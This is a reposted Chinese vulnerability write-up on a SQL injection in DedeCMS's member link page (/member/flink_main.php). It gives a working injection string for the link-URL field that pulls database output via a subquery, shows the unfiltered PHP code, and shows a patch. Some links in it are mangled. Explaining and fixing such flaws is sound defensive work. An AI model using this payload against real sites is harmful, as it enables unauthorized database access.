1. 漏洞描述
会员模块中存在的SQL注入
Relevant Link
http: // HdhCmsTestcnseay测试数据/1959/
2. 漏洞触发条件
1 . 打开 http: // 127.0.0.1/dedecms/member/flink_main.php# 2 . 在连接网址里面写入 http: // sss2‘),(8,1,@`‘`),(8,(select user()),‘33333 /* 连接名称随意 这里的8 是你的用户ID 想要查看必须得知道自己的用户id,通过查看cookie里面有一个DedeUserID,就是自己的用户id */
Relevant Link:
http: // HdhCmsTestwooyun.org/bugs/wooyun-2014-048878
3. 漏洞影响范围
4. 漏洞代码分析
/member/flink_main.php
if ($dopost== " addnew " )
{
AjaxHead();
$row = $dsql->GetOne( " Select count(*) as dd From `#@__member_flink` where mid=‘ " .$cfg_ml->M_ID. " ‘ " );
if ($row[ ‘ dd ‘ ]>= 50 )
{
echo " <font color=‘red‘>增加网址失败,因为已经达到五十个网址的上限!</font> " ;
GetLinkList($dsql);
exit();
}
// 如果前面有http就不过滤了
if (!eregi( " ^http:// " ,$url))
{
$url = " http:// " .HtmlReplace($url, 2 );
}
$title = HtmlReplace($title);
// $url未经过过滤就带入SQL查询
$inquery = " INSERT INTO `#@__member_flink`(mid,title,url) VALUES( " .$cfg_ml->M_ID. " ,‘$title‘,‘$url‘); " ;
$dsql -> ExecuteNoneQuery($inquery);
echo " <font color=‘red‘>成功增加一链接!</font> " ;
GetLinkList($dsql);
exit();
}
5. 防御方法
/member/flink_main.php
if ($dopost== " addnew " )
{
AjaxHead();
$row = $dsql->GetOne( " Select count(*) as dd From `#@__member_flink` where mid=‘ " .$cfg_ml->M_ID. " ‘ " );
if ($row[ ‘ dd ‘ ]>= 50 )
{
echo " <font color=‘red‘>增加网址失败,因为已经达到五十个网址的上限!</font> " ;
GetLinkList($dsql);
exit();
}
// 如果前面有http就不过滤了
if (!eregi( " ^http:// " ,$url))
{
$url = " http:// " .HtmlReplace($url, 2 );
}
$title = HtmlReplace($title);
/* $url过滤 */
$url = HtmlReplace($url);
/**/
$inquery = " INSERT INTO `#@__member_flink`(mid,title,url) VALUES( " .$cfg_ml->M_ID. " ,‘$title‘,‘$url‘); " ;
$dsql -> ExecuteNoneQuery($inquery);
echo " <font color=‘red‘>成功增加一链接!</font> " ;
GetLinkList($dsql);
exit();
}
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
dedecms /member/flink_main.php SQL Injection Vul
标签:
查看更多关于dedecms /member/flink_main.php SQL Injection Vul的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did160463